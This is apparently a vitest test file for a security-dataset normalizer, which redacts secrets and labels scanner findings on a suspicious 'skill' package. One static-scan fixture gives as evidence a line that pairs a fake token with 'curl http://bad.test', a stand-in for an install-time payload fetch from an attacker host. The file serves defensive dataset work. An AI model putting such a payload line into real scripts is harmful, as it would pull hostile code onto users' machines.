// clawhub/scripts/security-dataset/normalize.test.ts

import { describe, expect, it } from "vitest";
import {
  assignSplit,
  hashString,
  normalizeArtifactExport,
  redactText,
  type ArtifactExportInput,
} from "./normalize";

// Single timestamp reused by every date-like field of the fixture.
// Date.UTC takes a zero-based month, so (2026, 3, 29) is 29 April 2026 UTC.
const fixtureTimestamp = Date.UTC(2026, 3, 29);

// Produces a 64-character placeholder digest by repeating `fill`
// (64 is the length of a hex-encoded SHA-256).
const fakeSha256 = (fill: string): string => fill.repeat(64);

// Baseline export record shared by the tests below: a "skill" artifact with
// two files and one result from each scanner (VirusTotal, static, LLM).
// Individual tests spread this object and override only the fields they need.
const baseArtifact: ArtifactExportInput = {
  sourceKind: "skill",
  sourceDocId: "skillVersionDoc123",
  parentDocId: "skillDoc123",
  publicName: "Suspicious Demo",
  publicSlug: "suspicious-demo",
  version: "1.0.0",
  artifactSha256: fakeSha256("a"),
  // Deliberately contains an e-mail address and a token assignment so the
  // redaction path has something to act on.
  skillMdContentRedacted:
    "# Suspicious Demo\nUse this skill to inspect shell scripts.\nContact admin@example.com with token=supersecret123.",
  createdAt: fixtureTimestamp,
  softDeletedAt: null,
  files: [
    {
      path: "SKILL.md",
      size: 200,
      sha256: fakeSha256("b"),
      contentType: "text/markdown",
    },
    {
      path: "scripts/install.sh",
      size: 100,
      sha256: fakeSha256("c"),
      contentType: "text/x-shellscript",
    },
  ],
  capabilityTags: ["shell", "automation"],
  packageFamily: null,
  packageChannel: null,
  packageExecutesCode: null,
  sourceRepoHost: null,
  vtAnalysis: {
    status: "completed",
    verdict: "clean",
    analysis: "No engines flagged this artifact.",
    source: "virustotal",
    scanner: "vt-v3",
    engineStats: { malicious: 0, suspicious: 0, harmless: 30 },
    checkedAt: fixtureTimestamp,
  },
  staticScan: {
    status: "malicious",
    reasonCodes: ["malicious.install_terminal_payload", "suspicious.dangerous_exec"],
    findings: [
      {
        code: "malicious.install_terminal_payload",
        severity: "critical",
        file: "scripts/install.sh",
        line: 42,
        message: "Installs a terminal payload",
        // Evidence embeds a token-shaped value to exercise evidence redaction.
        evidence: "token=ghp_abcdefghijklmnopqrstuvwxyz1234567890 curl http://bad.test",
      },
    ],
    summary: "Detected terminal payload",
    engineVersion: "v2.4.2",
    checkedAt: fixtureTimestamp,
  },
  llmAnalysis: {
    status: "completed",
    verdict: "suspicious",
    confidence: "medium",
    summary: "The install script is suspicious.",
    dimensions: null,
    guidance: null,
    findings: null,
    model: "test-model",
    checkedAt: fixtureTimestamp,
  },
  moderationConsensus: null,
};

// Suite for the normalizer helpers imported from ./normalize:
// normalizeArtifactExport, assignSplit, redactText and hashString.
describe("security dataset normalizer", () => {
  it("normalizes artifact, scanner, finding, label, and split rows", () => {
    // Same digest the fixture uses for artifactSha256.
    const artifactSha = "a".repeat(64);
    const normalized = normalizeArtifactExport([baseArtifact]);

    // Artifact row: one row per input artifact, with derived file statistics.
    expect(normalized.artifacts).toHaveLength(1);
    const firstArtifact = normalized.artifacts[0];
    expect(firstArtifact).toMatchObject({
      artifact_id: `skill:${artifactSha}`,
      source_kind: "skill",
      source_table: "skillVersions",
      public_slug: "suspicious-demo",
      skill_md_content_redacted:
        "# Suspicious Demo Use this skill to inspect shell scripts. Contact [REDACTED_SECRET] with [REDACTED_SECRET]",
      created_month: "2026-04",
      file_count: 2,
      total_bytes: 300,
      file_ext_counts: { ".md": 1, ".sh": 1 },
      capability_tags: ["automation", "shell"],
      has_vt_scan: true,
      has_static_scan: true,
      has_llm_scan: true,
    });

    // Scanner rows are expected in this exact order.
    const scannerOrder = normalized.scanResults.map((result) => result.scanner);
    expect(scannerOrder).toEqual(["static", "virustotal", "llm"]);

    // Static finding row: the path is asserted via its hash, the line via a bucket.
    const firstFinding = normalized.staticFindings[0];
    expect(firstFinding).toMatchObject({
      code: "malicious.install_terminal_payload",
      severity: "critical",
      file_path_hash: hashString("scripts/install.sh"),
      file_ext: ".sh",
      line_bucket: "21-50",
    });
    expect(firstFinding?.evidence_redacted).toContain("[REDACTED_SECRET]");

    // Label row attributed to the moderation-consensus source.
    const consensusLabel = normalized.labels.find(
      ({ label_source }) => label_source === "moderation_consensus",
    );
    expect(consensusLabel).toMatchObject({
      label: "malicious",
      label_confidence: "derived_consensus",
      scanner_agreement: 1,
    });

    // Split row: keyed by the hash of the artifact digest.
    expect(normalized.splits).toHaveLength(1);
    const firstSplit = normalized.splits[0];
    expect(firstSplit?.split_key).toBe(hashString(artifactSha));
  });

  it("keeps identical artifact hashes in the same deterministic split", () => {
    const sharedHash = "shared-sha";
    const firstAssignment = assignSplit(sharedHash);
    const secondAssignment = assignSplit(sharedHash);

    expect(firstAssignment).toBe(secondAssignment);
  });

  it("redacts common secret-like values and caps long text", () => {
    const requestedCap = 80;
    const filler = "x".repeat(400);
    const redacted = redactText(`api_key="supersecretvalue123" ${filler}`, requestedCap);

    expect(redacted).toContain("[REDACTED_SECRET]");
    // NOTE(review): the bound is two above the requested cap — presumably room
    // for a truncation marker; confirm against redactText.
    expect(redacted?.length).toBeLessThanOrEqual(82);
  });

  it("preserves useful skill text while redacting sensitive content", () => {
    const bearerToken = "abcdefghijklmnopqrstuvwxyz123456";
    // Harmless instructions followed by a bearer header and a PEM-style key block.
    const skillMarkdown = [
      "Run static analysis with `bun test`.",
      `Authorization: Bearer ${bearerToken}`,
      "-----BEGIN PRIVATE KEY-----",
      "abc",
      "-----END PRIVATE KEY-----",
    ].join("\n");

    const normalized = normalizeArtifactExport([
      {
        ...baseArtifact,
        skillMdContentRedacted: skillMarkdown,
      },
    ]);
    const redactedMarkdown = normalized.artifacts[0]?.skill_md_content_redacted;

    expect(redactedMarkdown).toContain("Run static analysis");
    expect(redactedMarkdown).toContain("[REDACTED_SECRET]");
    expect(redactedMarkdown).not.toContain(bearerToken);
    expect(redactedMarkdown).not.toContain("PRIVATE KEY");
  });
});